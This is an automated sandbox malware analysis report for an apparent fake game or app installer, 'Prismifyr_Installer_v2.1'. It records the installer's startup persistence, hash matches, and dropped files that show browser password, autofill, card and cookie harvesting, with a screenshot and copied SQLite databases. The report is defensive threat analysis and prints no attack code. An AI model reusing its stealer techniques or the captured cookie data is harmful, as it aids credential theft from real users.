                                                                                                                                                                  https://pypi.python.org/pypi/pyfakefsPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://goo.gl/EuHzyvPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      http://public.kitware.com/Bug/view.php?id=8392Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html).Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://beacons4.gvt2.com/domainreliability/uploadPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000007014000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.jsPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://github.com/sass/node-sass/blob/master/binding.gyp)Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://nodejs.org/api/fs.html#fs_fs_writefile_file_data_options_callback).Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://code.google.com/p/gyp/Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://w3c.github.io/aria/#aria-hidden.BlockedPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      https://docs.python.org/2/library/subprocess.html:Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://github.com/GPUOpen-LibrariesAndSDKs/VulkanMemoryAllocatorPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://goo.gl/HxfxSQOriginPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://nodejs.org/api/fs.html#fs_fs_writefilesync_file_data_options)Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              http://crl.godaddy.com/gds1-20Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://sqlite.org/forum/forumpost/726219164bPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://developer.android.com/tools/extras/support-library.htmlPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    No contacted IP infos
                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                    Analysis ID:1541090
                                                                                                                                                                                                    Start date and time:2024-10-24 12:01:19 +02:00
                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                    Overall analysis duration:0h 9m 48s
                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                    Number of analysed new started processes analysed:39
                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                    Sample name:Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                    Classification:mal60.adwa.spyw.winEXE@48/136@0/0
                                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                    • Number of executed functions: 41
                                                                                                                                                                                                    • Number of non-executed functions: 26
                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                    • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                    • VT rate limit hit for: Prismifyr_Installer_v2.1 Setup 1.0.0.exe
                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                    06:02:30API Interceptor20x Sleep call for process: Prismifyr_Installer_v2.1 Setup 1.0.0.exe modified
                                                                                                                                                                                                    06:02:59API Interceptor16x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                    12:03:13AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                    No context
                                                                                                                                                                                                    No context
                                                                                                                                                                                                    No context
                                                                                                                                                                                                    No context
                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\d3dcompiler_47.dllsvchost.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      JaborSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        ArenaWarsSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          ArenaWarsSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                            DungeOfDestiny Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              Game.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                bot_library.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                  svAsYrT598.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    kc8qrDHj1V.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):22
                                                                                                                                                                                                                        Entropy (8bit):3.2776134368191157
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:SWSKXB5LQ:lSKXvLQ
                                                                                                                                                                                                                        MD5:1B62F8861D5FB6932E6BC28C2D629F80
                                                                                                                                                                                                                        SHA1:8A35DBA7006B138C1EA87918A2373A52462FAE0D
                                                                                                                                                                                                                        SHA-256:EC4181FA4DA153D819F2850B51A5697D1B68BB0FE005047897F911D7B0F1CDA3
                                                                                                                                                                                                                        SHA-512:CE42BFC0DAFC54FD63A4A3F8DED46917D4D37E77E469A2E3D1F8D2EB8B2406CAD7E7FECEF7E40A39C143F323F9E8C8E28E12306485248E4040FA0D877BFFB9F3
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:no password found for
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):38
                                                                                                                                                                                                                        Entropy (8bit):3.8301826981560274
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:PQRKcJW5KeBF3R3AV:PQRKcY5JFh3AV
                                                                                                                                                                                                                        MD5:A9ABCDF8B95C77D28F375059735CF869
                                                                                                                                                                                                                        SHA1:777D43D8EFF0B86F071B5BE1094A47C7A1E5CD6B
                                                                                                                                                                                                                        SHA-256:3664D16D47D3E7CD460E115BE845C856BA01D8148CB1B322F46C92D1B7FAE87B
                                                                                                                                                                                                                        SHA-512:9805838DB162353B7FFF8B4F780E4DD633C4ADA17A6484B60DC53C05CFB7DDCF6C9B5A8C2152E487AE1A8CEF16F2E9BC13069D5F7048D5203BB1664911214B3F
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:No autofills found for Google Default.
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):38
                                                                                                                                                                                                                        Entropy (8bit):3.984348238943494
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:MRn+nJF3R3AV:O+JFh3AV
                                                                                                                                                                                                                        MD5:3CCDE141A644177CCFEF42671BC05729
                                                                                                                                                                                                                        SHA1:2B836E8CE1CA28E305E784011888A482970814BF
                                                                                                                                                                                                                        SHA-256:4B399E4980A0AB09BCB8263DFF5F2A3EBAF500995A98994536AB27D3021E5D7A
                                                                                                                                                                                                                        SHA-512:1CE7D9431E18FAC1CCC0FE026593B625D7CF5CEFA677E4BBE061AEB92A0D8E11211E2DC4C772D00898433E15928AF52D57E782F42C2F210BF6350CBCAE4B96ED
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:No bookmarks found for Google Default.
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):273
                                                                                                                                                                                                                        Entropy (8bit):5.849802292364643
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:6:Pk3rocHDKJlSMDuyXdt3RdVAkEhW/UPmTU4OvOrGISsc3rocHDyzxbz:c79mlDuyXv3RdJqmOvO60c79El
                                                                                                                                                                                                                        MD5:DD605F6047E733234D956ACDAC6C2CBD
                                                                                                                                                                                                                        SHA1:9AD8EFB6F1F64BC0CBE5600BE933FCDC9C84C913
                                                                                                                                                                                                                        SHA-256:1D5C69E539666543622C83F888C595A540285ACAE1F1D9A475CA7D524B736396
                                                                                                                                                                                                                        SHA-512:3FBD2B2B0F983612E44BDA05FB9D1E11026DE464F3D2DEB4DA3889C8C363145BE51B77BFACB41038545AAE241E484E83F167396E06D581F3F628C684E40CE272
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:.google.com.TRUE./.FALSE.2597573456.NID.511=UBeNCkZ3L8yXcx8qh4JFUXkwkNC9IrdiRdbjSTjqSiFh8WrRcbKr_rOJbgHY6TA4RT-6ps0bhemfwCPBsLMgPT7-gTcWqHvZvZbafOpkqRy0dLyYG9AjP2vbUBomarnc9pcZVlhHkUeUaWMurD0GGXyW05_B_1IyUNYEELmyqRg..google.com.TRUE./.FALSE.2597573456.1P_JAR.2023-10-05-06.
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):14
                                                                                                                                                                                                                        Entropy (8bit):3.2359263506290334
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:0Cln:jn
                                                                                                                                                                                                                        MD5:53141EAFEAB294780AA9A86A7484510F
                                                                                                                                                                                                                        SHA1:AD8925270C1A270F37B158147843FFCA3E157EFB
                                                                                                                                                                                                                        SHA-256:F33C30531D5A9B7CEBDD5F470F30BE8C038B38185021C405F031E2DDFBA422FB
                                                                                                                                                                                                                        SHA-512:86507915A541D3ECE8DA3B7DBBC6FB99F64853FA1460698EFF6B14322B2D904DD7B889F09C04DE1E12DCEAA1D59E70D94638173806F23D9F21850EA94152D484
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:no cards found
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):36
                                                                                                                                                                                                                        Entropy (8bit):4.0067499186387785
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:GX7JP3R3AV:eh3AV
                                                                                                                                                                                                                        MD5:BCD6AC81DB0CA6BF68E1CFC4ED70CBF1
                                                                                                                                                                                                                        SHA1:66AC8872C0513C02E3B2499FB621F824F587A5E4
                                                                                                                                                                                                                        SHA-256:9C9F32F5A0094A9E1D11E8DC6FC19A8F161434833EA0A2C5448F0172B0E4B245
                                                                                                                                                                                                                        SHA-512:CD8D2B0A5D9EE5FA7D8D665CB6D1ECC901A85BE0A657962481E167E341974DB5510049BA7B93D18E96C9686E3563AF1D69AF47D4F229BB4336916AB43153D1CB
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:No history found for Google Default.
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):22
                                                                                                                                                                                                                        Entropy (8bit):3.2776134368191157
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:SWSKXB5LQ:lSKXvLQ
                                                                                                                                                                                                                        MD5:1B62F8861D5FB6932E6BC28C2D629F80
                                                                                                                                                                                                                        SHA1:8A35DBA7006B138C1EA87918A2373A52462FAE0D
                                                                                                                                                                                                                        SHA-256:EC4181FA4DA153D819F2850B51A5697D1B68BB0FE005047897F911D7B0F1CDA3
                                                                                                                                                                                                                        SHA-512:CE42BFC0DAFC54FD63A4A3F8DED46917D4D37E77E469A2E3D1F8D2EB8B2406CAD7E7FECEF7E40A39C143F323F9E8C8E28E12306485248E4040FA0D877BFFB9F3
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:no password found for
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):723774
                                                                                                                                                                                                                        Entropy (8bit):7.929666169821963
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:HZ/HLvaMWGmn4woKZc9FwK2iIeOEM8505vPRm+OjEYLtMK26MS6NNu8qCKOhiHlP:HpLdWGWrUInEB5CZmuYLtL26MS6H7KO8
                                                                                                                                                                                                                        MD5:2F89AF054F06FFA920DA05F08AB9021D
                                                                                                                                                                                                                        SHA1:381ACF8F43551143AE51F1557C72903C25647412
                                                                                                                                                                                                                        SHA-256:A8E754F496AE6DC88DC8876FBA62E817AE600EA6C03D88453D81F49D71CDFFAB
                                                                                                                                                                                                                        SHA-512:8CA71BD3B5B8D22AF2C65F2C6B3E403BFF9F9DD8C0495A2125284A2735E15015F960E0D3BCCDEE8CB75FBCB6190895A0D23840ED62234D39046DBAA1855F25FD
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....mG....].........t....37f...w4.=...H.A....^H .......0.........#t..... .....U..........".../....R.z..:.S~^M.g..t.....m~...g..=i..91}..fM....9!.....zQ|..*..5I....q.t.}..|..}.&.......F......b..}l..G.).......t.J..`....=.L.^.=...I.9........~....9.=.91.......o.t?~.XL.t?v..|..E.......3.~...L}H..#.=0.9..}.....1>........#1....}.m.YT0....;.O,..zW...w..e.;.....s.v..?....L..G.Eo..z..{ ...?.9.+V.....m_c..E..~.L.[..{..|......j.n....y...xSf..7....>....KR.`.....Pu.x...R...R\k....}j..>..K..j`.y...S{_.....j.>i........}.4}..[..u9.t..%.K9{..A.......T...:.^.....}...X.O.d...)gYj..Ky.K.K...W.9..>.].....hK...].....m`.h.4...NW...{^_-.#...K.t.~...WT............N.U..............%.^.Y.K.n....c~Y..K.._....X..;...O{....c`...R|.4.P.j..g.mwi.........y..M.n.......V...... ...v....m.....Z.e.5......j.x....%.-.uS....q...{.b.O...Uw.s^g..rL....b
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                        Entropy (8bit):0.8508558324143882
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                                                                                                                        MD5:933D6D14518371B212F36C3835794D75
                                                                                                                                                                                                                        SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                                                                                                                        SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                                                                                                                        SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                                                                        Entropy (8bit):1.136471148832945
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                                                                        Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                        MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                        SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                        SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                        SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\Prismifyr_Installer_v2.1.exe
                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                                                                        Entropy (8bit):1.136471148832945
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                                                        MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                                                        SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                                                        SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                                                        SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\screenCapture\screenCapture_1.3.2.exe
                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):862
                                                                                                                                                                                                                        Entropy (8bit):5.389156768960034
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:24:ML9E4KQ71qE4GIsCKDE4KGKZI6Kh6+84xp3/VclT:MxHKQ71qHGIsCYHKGSI6o6+vxp3/elT
                                                                                                                                                                                                                        MD5:ECB6C3B4BC34F9A6B6D6A47A91A9F431
                                                                                                                                                                                                                        SHA1:874ADDE9AB5F7FC4D34F4226690423209C94DA24
                                                                                                                                                                                                                        SHA-256:F31996CFFF16D9D359817845CB9E8B97A0905397F5586F431DD6BB0FF0114B74
                                                                                                                                                                                                                        SHA-512:4AE332166345D0D9E3CAD584A8C9C57092D1F0A428A2AC12373DB58F78B653846A7A27828DE1F521CE81A9CCEA73C143BA7D0FE91A9FCB9F80CD144AFFBA93D9
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
